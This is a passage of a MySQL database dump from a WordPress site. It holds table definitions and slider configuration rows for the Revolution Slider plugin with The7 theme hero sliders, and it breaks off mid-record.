-- Table structure for table `dnctiavkr_revslider_layer_animations_bkp`
--

DROP TABLE IF EXISTS `dnctiavkr_revslider_layer_animations_bkp`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_revslider_layer_animations_bkp` (
  `id` int(9) NOT NULL AUTO_INCREMENT,
  `handle` text NOT NULL,
  `params` text NOT NULL,
  `settings` text DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_revslider_layer_animations_bkp`
--

LOCK TABLES `dnctiavkr_revslider_layer_animations_bkp` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_revslider_layer_animations_bkp` DISABLE KEYS */;
/*!40000 ALTER TABLE `dnctiavkr_revslider_layer_animations_bkp` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_revslider_navigations`
--

DROP TABLE IF EXISTS `dnctiavkr_revslider_navigations`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_revslider_navigations` (
  `id` int(9) NOT NULL AUTO_INCREMENT,
  `name` varchar(191) NOT NULL,
  `handle` varchar(191) NOT NULL,
  `type` varchar(191) NOT NULL,
  `css` longtext NOT NULL,
  `markup` longtext NOT NULL,
  `settings` longtext DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_revslider_navigations`
--

LOCK TABLES `dnctiavkr_revslider_navigations` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_revslider_navigations` DISABLE KEYS */;
/*!40000 ALTER TABLE `dnctiavkr_revslider_navigations` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_revslider_navigations_bkp`
--

DROP TABLE IF EXISTS `dnctiavkr_revslider_navigations_bkp`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_revslider_navigations_bkp` (
  `id` int(9) NOT NULL AUTO_INCREMENT,
  `name` varchar(191) NOT NULL,
  `handle` varchar(191) NOT NULL,
  `type` varchar(191) NOT NULL,
  `css` longtext NOT NULL,
  `markup` longtext NOT NULL,
  `settings` longtext DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_revslider_navigations_bkp`
--

LOCK TABLES `dnctiavkr_revslider_navigations_bkp` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_revslider_navigations_bkp` DISABLE KEYS */;
/*!40000 ALTER TABLE `dnctiavkr_revslider_navigations_bkp` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_revslider_sliders`
--

DROP TABLE IF EXISTS `dnctiavkr_revslider_sliders`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_revslider_sliders` (
  `id` int(9) NOT NULL AUTO_INCREMENT,
  `title` tinytext NOT NULL,
  `alias` tinytext DEFAULT NULL,
  `params` longtext NOT NULL,
  `settings` text DEFAULT NULL,
  `type` varchar(191) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`),
  KEY `type_index` (`type`(8))
) ENGINE=InnoDB AUTO_INCREMENT=6 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_revslider_sliders`
--

LOCK TABLES `dnctiavkr_revslider_sliders` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_revslider_sliders` DISABLE KEYS */;
INSERT INTO `dnctiavkr_revslider_sliders` VALUES
(1,'the7','the7-landing-hero-image','{\"id\":\"\",\"shortcode\":\"[rev_slider alias=\\\\\\\"the7-landing-hero-image\\\\\\\"]\",\"layouttype\":\"fullscreen\",\"type\":\"hero\",\"sourcetype\":\"gallery\",\"googleFont\":[],\"addOns\":[],\"source\":{\"gallery\":[],\"post\":{\"excerptLimit\":\"55\",\"maxPosts\":\"30\",\"fetchType\":\"cat_tag\",\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"post\",\"list\":\"\",\"sortDirection\":\"DESC\",\"subType\":\"post\"},\"woo\":{\"excerptLimit\":\"55\",\"maxProducts\":\"30\",\"featuredOnly\":false,\"inStockOnly\":false,\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"product\",\"sortDirection\":\"DESC\",\"regPriceFrom\":\"\",\"regPriceTo\":\"\",\"salePriceFrom\":\"\",\"salePriceTo\":\"\"},\"instagram\":{\"count\":\"\",\"hashTag\":\"\",\"transient\":\"1200\",\"type\":\"user\",\"userId\":\"\"},\"facebook\":{\"album\":\"\",\"appId\":\"\",\"appSecret\":\"\",\"count\":\"\",\"pageURL\":\"\",\"transient\":\"1200\",\"typeSource\":\"album\"},\"flickr\":{\"apiKey\":\"\",\"count\":\"\",\"galleryURL\":\"\",\"groupURL\":\"\",\"photoSet\":\"\",\"transient\":\"1200\",\"type\":\"publicphotos\",\"userURL\":\"\"},\"twitter\":{\"accessSecret\":\"\",\"accessToken\":\"\",\"consumerKey\":\"\",\"consumerSecret\":\"\",\"count\":\"\",\"excludeReplies\":false,\"imageOnly\":false,\"includeRetweets\":false,\"transient\":\"1200\",\"userId\":\"\"},\"vimeo\":{\"albumId\":\"\",\"channelName\":\"\",\"count\":\"\",\"transient\":\"1200\",\"groupName\":\"\",\"typeSource\":\"user\",\"userName\":\"\"},\"youtube\":{\"api\":\"\",\"channelId\":\"\",\"count\":\"\",\"playList\":\"\",\"transient\":\"1200\",\"typeSource\":\"channel\"}},\"def\":{\"transition\":\"fade\",\"transitionDuration\":\"300\",\"delay\":\"9000\",\"background\":{\"fit\":\"cover\",\"fitX\":\"100\",\"fitY\":\"100\",\"position\":\"center center\",\"positionX\":\"0\",\"positionY\":\"0\",\"repeat\":\"no-repeat\",\"imageSourceType\":\"full\"},\"panZoom\":{\"set\":false,\"blurStart\":\"0\",\"blurEnd\":\"0\",\"duration\":\"\",\"ease\":\"none\",\"fitEnd\":\"100\",\"fitStart\":\"100\",\"xEnd\":\"0\",\"yEnd\":\"0\",\"xStart\":\"0\",\"yStart\":\"0\",\"rotateStart\":\"0\",\"rotateEnd\":\"0\"}},\"size\":{\"respectAspectRatio\":false,\"disableForceFullWidth\":false,\"gridEQModule\":false,\"custom\":{\"d\":true,\"n\":true,\"t\":true,\"m\":true},\"minHeightFullScreen\":\"500\",\"minHeight\":\"500\",\"fullScreenOffsetContainer\":\"\",\"fullScreenOffset\":\"\",\"width\":{\"d\":1800,\"n\":1700,\"t\":1120,\"m\":860},\"height\":{\"d\":850,\"n\":850,\"t\":1200,\"m\":1200},\"overflow\":false,\"maxWidth\":\"\"},\"codes\":{\"css\":\"\",\"javascript\":\"\"},\"carousel\":{\"borderRadius\":\"0\",\"borderRadiusUnit\":\"px\",\"ease\":\"power3.inOut\",\"fadeOut\":true,\"scale\":false,\"horizontal\":\"center\",\"vertical\":\"center\",\"infinity\":false,\"maxItems\":\"3\",\"maxRotation\":\"0\",\"paddingTop\":\"0\",\"paddingBottom\":\"0\",\"rotation\":false,\"scaleDown\":50,\"space\":\"0\",\"speed\":\"800\",\"stretch\":false,\"varyFade\":false,\"varyRotate\":false,\"varyScale\":false,\"showAllLayers\":false},\"hero\":{\"activeSlide\":\"-1\"},\"layout\":{\"bg\":{\"color\":\"#0f1217\",\"padding\":\"0\",\"dottedOverlay\":\"none\",\"shadow\":\"0\",\"useImage\":false,\"image\":\"\",\"fit\":\"cover\",\"position\":\"center center\",\"repeat\":\"no-repeat\"},\"spinner\":{\"color\":\"#FFFFFF\",\"type\":\"-1\"},\"position\":{\"marginTop\":\"0\",\"marginBottom\":\"0\",\"marginLeft\":\"0\",\"marginRight\":\"0\",\"align\":\"center\"}},\"visibility\":{\"hideSelectedLayersUnderLimit\":\"0\",\"hideAllLayersUnderLimit\":\"0\",\"hideSliderUnderLimit\":\"0\"},\"general\":{\"slideshow\":{\"stopOnHover\":false,\"stopSlider\":false,\"stopAfterLoops\":\"0\",\"stopAtSlide\":\"2\",\"shuffle\":false,\"loopSingle\":false,\"viewPort\":false,\"viewPortStart\":\"wait\",\"viewPortArea\":\"20%\",\"presetSliderHeight\":false,\"initDelay\":\"0\",\"waitForInit\":false,\"slideShow\":true,\"globalViewPort\":true,\"globalViewDist\":\"-200px\"},\"progressbar\":{\"set\":false,\"height\":\"5\",\"position\":\"top\",\"color\":\"rgba(0,0,0,0.15)\"},\"firstSlide\":{\"set\":false,\"duration\":\"300\",\"slotAmount\":\"7\",\"type\":\"fade\",\"alternativeFirstSlideSet\":false,\"alternativeFirstSlide\":\"1\"},\"layerSelection\":false,\"lazyLoad\":\"smart\",\"nextSlideOnFocus\":false,\"disableFocusListener\":false,\"disableOnMobile\":false,\"autoPlayVideoOnMobile\":true,\"disablePanZoomMobile\":false,\"useWPML\":false},\"nav\":{\"preview\":{\"width\":\"100\",\"height\":\"50\"},\"swipe\":{\"set\":false,\"setOnDesktop\":false,\"blockDragVertical\":false,\"direction\":\"horizontal\",\"minTouch\":\"1\",\"velocity\":\"75\"},\"keyboard\":{\"set\":false,\"direction\":\"horizontal\"},\"mouse\":{\"set\":false,\"reverse\":\"default\"},\"arrows\":{\"set\":false,\"rtl\":false,\"style\":1000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"left\":{\"horizontal\":\"left\",\"vertical\":\"center\",\"offsetX\":\"20\",\"offsetY\":\"0\",\"align\":\"slider\"},\"right\":{\"horizontal\":\"right\",\"vertical\":\"center\",\"offsetX\":\"20\",\"offsetY\":\"0\",\"align\":\"slider\"}},\"thumbs\":{\"set\":false,\"rtl\":false,\"style\":2000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":\"5\",\"direction\":\"horizontal\",\"height\":\"50\",\"width\":\"100\",\"widthMin\":\"100\",\"innerOuter\":\"inner\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"space\":\"5\",\"align\":\"slider\",\"padding\":\"5\",\"wrapperColor\":\"transparent\"},\"tabs\":{\"set\":false,\"rtl\":false,\"style\":4000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":\"5\",\"direction\":\"horizontal\",\"height\":\"50\",\"width\":\"100\",\"widthMin\":\"100\",\"innerOuter\":\"inner\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"space\":\"5\",\"align\":\"slider\",\"padding\":\"5\",\"wrapperColor\":\"transparent\"},\"bullets\":{\"set\":false,\"rtl\":false,\"style\":3000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"direction\":\"horizontal\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"align\":\"slider\",\"space\":\"5\",\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\"}},\"troubleshooting\":{\"ignoreHeightChanges\":false,\"ignoreHeightChangesUnderLimit\":\"0\",\"alternateImageType\":\"off\",\"alternateURL\":\"\",\"jsNoConflict\":false,\"jsInBody\":false,\"outPutFilter\":\"none\",\"debugMode\":false,\"simplify_ie8_ios4\":false},\"parallax\":{\"set\":true,\"setDDD\":false,\"disableOnMobile\":false,\"levels\":[\"5\",\"10\",\"15\",\"20\",\"25\",\"30\",\"35\",\"40\",\"45\",\"46\",\"47\",\"48\",\"49\",\"50\",\"-50\",\"55\"],\"ddd\":{\"BGFreeze\":false,\"layerOverflow\":false,\"overflow\":false,\"shadow\":false,\"zCorrection\":\"65\"},\"mouse\":{\"speed\":\"400\",\"bgSpeed\":\"0\",\"layersSpeed\":\"0\",\"origo\":\"enterpoint\",\"type\":\"scroll\"}},\"scrolleffects\":{\"set\":false,\"setBlur\":false,\"setFade\":false,\"setGrayScale\":false,\"bg\":false,\"direction\":\"both\",\"maxBlur\":\"10\",\"multiplicator\":\"1.3\",\"multiplicatorLayers\":\"1.3\",\"disableOnMobile\":true,\"tilt\":\"30\",\"layers\":false},\"version\":\"6.4.10\"}','{\"version\":\"6.4.10\"}',''),
(2,'The7 landing page hero image','the7-landing-page-hero-image','{\"id\":\"\",\"shortcode\":\"[rev_slider alias=\\\\\\\"the7-landing-page-hero-image\\\\\\\"]\",\"layouttype\":\"fullscreen\",\"type\":\"hero\",\"sourcetype\":\"gallery\",\"googleFont\":[],\"addOns\":[],\"source\":{\"gallery\":[],\"post\":{\"excerptLimit\":\"55\",\"maxPosts\":\"30\",\"fetchType\":\"cat_tag\",\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"post\",\"list\":\"\",\"sortDirection\":\"DESC\",\"subType\":\"post\"},\"woo\":{\"excerptLimit\":\"55\",\"maxProducts\":\"30\",\"featuredOnly\":false,\"inStockOnly\":false,\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"product\",\"sortDirection\":\"DESC\",\"regPriceFrom\":\"\",\"regPriceTo\":\"\",\"salePriceFrom\":\"\",\"salePriceTo\":\"\"},\"instagram\":{\"count\":\"\",\"hashTag\":\"\",\"transient\":\"1200\",\"type\":\"user\",\"userId\":\"\"},\"facebook\":{\"album\":\"\",\"appId\":\"\",\"appSecret\":\"\",\"count\":\"\",\"pageURL\":\"\",\"transient\":\"1200\",\"typeSource\":\"album\"},\"flickr\":{\"apiKey\":\"\",\"count\":\"\",\"galleryURL\":\"\",\"groupURL\":\"\",\"photoSet\":\"\",\"transient\":\"1200\",\"type\":\"publicphotos\",\"userURL\":\"\"},\"twitter\":{\"accessSecret\":\"\",\"accessToken\":\"\",\"consumerKey\":\"\",\"consumerSecret\":\"\",\"count\":\"\",\"excludeReplies\":false,\"imageOnly\":false,\"includeRetweets\":false,\"transient\":\"1200\",\"userId\":\"\"},\"vimeo\":{\"albumId\":\"\",\"channelName\":\"\",\"count\":\"\",\"transient\":\"1200\",\"groupName\":\"\",\"typeSource\":\"user\",\"userName\":\"\"},\"youtube\":{\"api\":\"\",\"channelId\":\"\",\"count\":\"\",\"playList\":\"\",\"transient\":\"1200\",\"typeSource\":\"channel\"}},\"def\":{\"transition\":\"fade\",\"transitionDuration\":\"300\",\"delay\":\"9000\",\"background\":{\"fit\":\"cover\",\"fitX\":\"100\",\"fitY\":\"100\",\"position\":\"center center\",\"positionX\":\"0\",\"positionY\":\"0\",\"repeat\":\"no-repeat\",\"imageSourceType\":\"full\"},\"panZoom\":{\"set\":false,\"blurStart\":\"0\",\"blurEnd\":\"0\",\"duration\":\"\",\"ease\":\"none\",\"fitEnd\":\"100\",\"fitStart\":\"100\",\"xEnd\":\"0\",\"yEnd\":\"0\",\"xStart\":\"0\",\"yStart\":\"0\",\"rotateStart\":\"0\",\"rotateEnd\":\"0\"}},\"size\":{\"respectAspectRatio\":false,\"disableForceFullWidth\":false,\"gridEQModule\":false,\"custom\":{\"d\":true,\"n\":true,\"t\":true,\"m\":true},\"minHeightFullScreen\":\"500\",\"minHeight\":\"500\",\"fullScreenOffsetContainer\":\"\",\"fullScreenOffset\":\"\",\"width\":{\"d\":1700,\"n\":1450,\"t\":1200,\"m\":900},\"height\":{\"d\":900,\"n\":900,\"t\":1260,\"m\":1260},\"overflow\":false,\"maxWidth\":\"\"},\"codes\":{\"css\":\"\",\"javascript\":\"\"},\"carousel\":{\"borderRadius\":\"0\",\"borderRadiusUnit\":\"px\",\"ease\":\"power3.inOut\",\"fadeOut\":true,\"scale\":false,\"horizontal\":\"center\",\"vertical\":\"center\",\"infinity\":false,\"maxItems\":\"3\",\"maxRotation\":\"0\",\"paddingTop\":\"0\",\"paddingBottom\":\"0\",\"rotation\":false,\"scaleDown\":50,\"space\":\"0\",\"speed\":\"800\",\"stretch\":false,\"varyFade\":false,\"varyRotate\":false,\"varyScale\":false,\"showAllLayers\":false},\"hero\":{\"activeSlide\":\"-1\"},\"layout\":{\"bg\":{\"color\":\"#0f1217\",\"padding\":\"0\",\"dottedOverlay\":\"none\",\"shadow\":\"0\",\"useImage\":false,\"image\":\"\",\"fit\":\"cover\",\"position\":\"center center\",\"repeat\":\"no-repeat\"},\"spinner\":{\"color\":\"#FFFFFF\",\"type\":\"-1\"},\"position\":{\"marginTop\":\"0\",\"marginBottom\":\"0\",\"marginLeft\":\"0\",\"marginRight\":\"0\",\"align\":\"center\"}},\"visibility\":{\"hideSelectedLayersUnderLimit\":\"0\",\"hideAllLayersUnderLimit\":\"0\",\"hideSliderUnderLimit\":\"0\"},\"general\":{\"slideshow\":{\"stopOnHover\":false,\"stopSlider\":false,\"stopAfterLoops\":\"0\",\"stopAtSlide\":\"2\",\"shuffle\":false,\"loopSingle\":false,\"viewPort\":false,\"viewPortStart\":\"wait\",\"viewPortArea\":\"20%\",\"presetSliderHeight\":false,\"initDelay\":\"0\",\"waitForInit\":false,\"slideShow\":true,\"globalViewPort\":true,\"globalViewDist\":\"-200px\"},\"progressbar\":{\"set\":false,\"height\":\"5\",\"position\":\"top\",\"color\":\"rgba(0,0,0,0.15)\"},\"firstSlide\":{\"set\":false,\"duration\":\"300\",\"slotAmount\":\"7\",\"type\":\"fade\",\"alternativeFirstSlideSet\":false,\"alternativeFirstSlide\":\"1\"},\"layerSelection\":false,\"lazyLoad\":\"smart\",\"nextSlideOnFocus\":false,\"disableFocusListener\":false,\"disableOnMobile\":false,\"autoPlayVideoOnMobile\":true,\"disablePanZoomMobile\":false,\"useWPML\":false},\"nav\":{\"preview\":{\"width\":\"100\",\"height\":\"50\"},\"swipe\":{\"set\":false,\"setOnDesktop\":false,\"blockDragVertical\":false,\"direction\":\"horizontal\",\"minTouch\":\"1\",\"velocity\":\"75\"},\"keyboard\":{\"set\":false,\"direction\":\"horizontal\"},\"mouse\":{\"set\":false,\"reverse\":\"default\"},\"arrows\":{\"set\":false,\"rtl\":false,\"style\":1000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"left\":{\"horizontal\":\"left\",\"vertical\":\"center\",\"offsetX\":\"20\",\"offsetY\":\"0\",\"align\":\"slider\"},\"right\":{\"horizontal\":\"right\",\"vertical\":\"center\",\"offsetX\":\"20\",\"offsetY\":\"0\",\"align\":\"slider\"}},\"thumbs\":{\"set\":false,\"rtl\":false,\"style\":2000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":\"5\",\"direction\":\"horizontal\",\"height\":\"50\",\"width\":\"100\",\"widthMin\":\"100\",\"innerOuter\":\"inner\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"space\":\"5\",\"align\":\"slider\",\"padding\":\"5\",\"wrapperColor\":\"transparent\"},\"tabs\":{\"set\":false,\"rtl\":false,\"style\":4000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":\"5\",\"direction\":\"horizontal\",\"height\":\"50\",\"width\":\"100\",\"widthMin\":\"100\",\"innerOuter\":\"inner\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"space\":\"5\",\"align\":\"slider\",\"padding\":\"5\",\"wrapperColor\":\"transparent\"},\"bullets\":{\"set\":false,\"rtl\":false,\"style\":3000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"direction\":\"horizontal\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"align\":\"slider\",\"space\":\"5\",\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\"}},\"troubleshooting\":{\"ignoreHeightChanges\":false,\"ignoreHeightChangesUnderLimit\":\"0\",\"alternateImageType\":\"off\",\"alternateURL\":\"\",\"jsNoConflict\":false,\"jsInBody\":false,\"outPutFilter\":\"none\",\"debugMode\":false,\"simplify_ie8_ios4\":false},\"parallax\":{\"set\":true,\"setDDD\":false,\"disableOnMobile\":false,\"levels\":[\"5\",\"10\",\"15\",\"20\",\"25\",\"30\",\"35\",\"40\",\"45\",\"46\",\"47\",\"48\",\"49\",\"50\",\"-50\",\"55\"],\"ddd\":{\"BGFreeze\":false,\"layerOverflow\":false,\"overflow\":false,\"shadow\":false,\"zCorrection\":\"65\"},\"mouse\":{\"speed\":\"400\",\"bgSpeed\":\"0\",\"layersSpeed\":\"0\",\"origo\":\"enterpoint\",\"type\":\"scroll\"}},\"scrolleffects\":{\"set\":false,\"setBlur\":false,\"setFade\":false,\"setGrayScale\":false,\"bg\":false,\"direction\":\"both\",\"maxBlur\":\"10\",\"multiplicator\":\"1.3\",\"multiplicatorLayers\":\"1.3\",\"disableOnMobile\":true,\"tilt\":\"30\",\"layers\":false},\"version\":\"6.4.10\"}','{\"version\":\"6.4.10\"}',''),
(3,'The7 Hero 18.10.2018','the7-hero-18-10-2018','{\"id\":\"\",\"shortcode\":\"[rev_slider alias=\\\"the7-hero-18-10-2018\\\"]\",\"layouttype\":\"fullscreen\",\"type\":\"hero\",\"sourcetype\":\"gallery\",\"googleFont\":[],\"addOns\":[],\"source\":{\"gallery\":[],\"post\":{\"excerptLimit\":\"55\",\"maxPosts\":\"30\",\"fetchType\":\"cat_tag\",\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"post\",\"list\":\"\",\"sortDirection\":\"DESC\",\"subType\":\"post\"},\"woo\":{\"excerptLimit\":\"55\",\"maxProducts\":\"30\",\"featuredOnly\":false,\"inStockOnly\":false,\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"product\",\"sortDirection\":\"DESC\",\"regPriceFrom\":\"\",\"regPriceTo\":\"\",\"salePriceFrom\":\"\",\"salePriceTo\":\"\"},\"instagram\":{\"count\":\"\",\"hashTag\":\"\",\"transient\":\"1200\",\"type\":\"user\",\"userId\":\"\"},\"facebook\":{\"album\":\"\",\"appId\":\"\",\"appSecret\":\"\",\"count\":\"\",\"pageURL\":\"\",\"transient\":\"1200\",\"typeSource\":\"album\"},\"flickr\":{\"apiKey\":\"\",\"count\":\"\",\"galleryURL\":\"\",\"groupURL\":\"\",\"photoSet\":\"\",\"transient\":\"1200\",\"type\":\"publicphotos\",\"userURL\":\"\"},\"twitter\":{\"accessSecret\":\"\",\"accessToken\":\"\",\"consumerKey\":\"\",\"consumerSecret\":\"\",\"count\":\"\",\"excludeReplies\":false,\"imageOnly\":false,\"includeRetweets\":false,\"transient\":\"1200\",\"userId\":\"\"},\"vimeo\":{\"albumId\":\"\",\"channelName\":\"\",\"count\":\"\",\"transient\":\"1200\",\"groupName\":\"\",\"typeSource\":\"user\",\"userName\":\"\"},\"youtube\":{\"api\":\"\",\"channelId\":\"\",\"count\":\"\",\"playList\":\"\",\"transient\":\"1200\",\"typeSource\":\"channel\"}},\"def\":{\"transition\":\"fade\",\"transitionDuration\":\"300\",\"delay\":\"9000\",\"background\":{\"fit\":\"cover\",\"fitX\":\"100\",\"fitY\":\"100\",\"position\":\"center center\",\"positionX\":\"0\",\"positionY\":\"0\",\"repeat\":\"no-repeat\",\"imageSourceType\":\"full\"},\"panZoom\":{\"set\":false,\"blurStart\":\"0\",\"blurEnd\":\"0\",\"duration\":\"\",\"ease\":\"none\",\"fitEnd\":\"100\",\"fitStart\":\"100\",\"xEnd\":\"0\",\"yEnd\":\"0\",\"xStart\":\"0\",\"yStart\":\"0\",\"rotateStart\":\"0\",\"rotateEnd\":\"0\"}},\"size\":{\"respectAspectRatio\":false,\"disableForceFullWidth\":false,\"gridEQModule\":false,\"custom\":{\"d\":true,\"n\":true,\"t\":true,\"m\":true},\"minHeightFullScreen\":\"500\",\"minHeight\":\"500\",\"fullScreenOffsetContainer\":\"\",\"fullScreenOffset\":\"\",\"width\":{\"d\":1700,\"n\":1450,\"t\":1200,\"m\":900},\"height\":{\"d\":900,\"n\":900,\"t\":1260,\"m\":1260},\"overflow\":false,\"maxWidth\":\"\"},\"codes\":{\"css\":\"\",\"javascript\":\"\"},\"carousel\":{\"borderRadius\":\"0\",\"borderRadiusUnit\":\"px\",\"ease\":\"power3.inOut\",\"fadeOut\":true,\"scale\":false,\"horizontal\":\"center\",\"vertical\":\"center\",\"infinity\":false,\"maxItems\":\"3\",\"maxRotation\":\"0\",\"paddingTop\":\"0\",\"paddingBottom\":\"0\",\"rotation\":false,\"scaleDown\":50,\"space\":\"0\",\"speed\":\"800\",\"stretch\":false,\"varyFade\":false,\"varyRotate\":false,\"varyScale\":false,\"showAllLayers\":false},\"hero\":{\"activeSlide\":\"-1\"},\"layout\":{\"bg\":{\"color\":\"#0f1217\",\"padding\":\"0\",\"dottedOverlay\":\"none\",\"shadow\":\"0\",\"useImage\":false,\"image\":\"\",\"fit\":\"cover\",\"position\":\"center center\",\"repeat\":\"no-repeat\"},\"spinner\":{\"color\":\"#FFFFFF\",\"type\":\"-1\"},\"position\":{\"marginTop\":\"0\",\"marginBottom\":\"0\",\"marginLeft\":\"0\",\"marginRight\":\"0\",\"align\":\"center\"}},\"visibility\":{\"hideSelectedLayersUnderLimit\":\"0\",\"hideAllLayersUnderLimit\":\"0\",\"hideSliderUnderLimit\":\"0\"},\"general\":{\"slideshow\":{\"stopOnHover\":false,\"stopSlider\":false,\"stopAfterLoops\":\"0\",\"stopAtSlide\":\"2\",\"shuffle\":false,\"loopSingle\":false,\"viewPort\":false,\"viewPortStart\":\"wait\",\"viewPortArea\":\"20%\",\"presetSliderHeight\":false,\"initDelay\":\"0\",\"waitForInit\":false,\"slideShow\":true,\"globalViewPort\":true,\"globalViewDist\":\"-200px\"},\"progressbar\":{\"set\":false,\"height\":\"5\",\"position\":\"top\",\"color\":\"rgba(0,0,0,0.15)\"},\"firstSlide\":{\"set\":false,\"duration\":\"300\",\"slotAmount\":\"7\",\"type\":\"fade\",\"alternativeFirstSlideSet\":false,\"alternativeFirstSlide\":\"1\"},\"layerSelection\":false,\"lazyLoad\":\"smart\",\"nextSlideOnFocus\":false,\"disableFocusListener\":false,\"disableOnMobile\":false,\"autoPlayVideoOnMobile\":true,\"disablePanZoomMobile\":false,\"useWPML\":false},\"nav\":{\"preview\":{\"width\":\"100\",\"height\":\"50\"},\"swipe\":{\"set\":false,\"setOnDesktop\":false,\"blockDragVertical\":false,\"direction\":\"horizontal\",\"minTouch\":\"1\",\"velocity\":\"75\"},\"keyboard\":{\"set\":false,\"direction\":\"horizontal\"},\"mouse\":{\"set\":false,\"reverse\":\"default\"},\"arrows\":{\"set\":false,\"rtl\":false,\"style\":1000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"left\":{\"horizontal\":\"left\",\"vertical\":\"center\",\"offsetX\":\"20\",\"offsetY\":\"0\",\"align\":\"slider\"},\"right\":{\"horizontal\":\"right\",\"vertical\":\"center\",\"offsetX\":\"20\",\"offsetY\":\"0\",\"align\":\"slider\"}},\"thumbs\":{\"set\":false,\"rtl\":false,\"style\":2000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":\"5\",\"direction\":\"horizontal\",\"height\":\"50\",\"width\":\"100\",\"widthMin\":\"100\",\"innerOuter\":\"inner\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"space\":\"5\",\"align\":\"slider\",\"padding\":\"5\",\"wrapperColor\":\"transparent\"},\"tabs\":{\"set\":false,\"rtl\":false,\"style\":4000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":\"5\",\"direction\":\"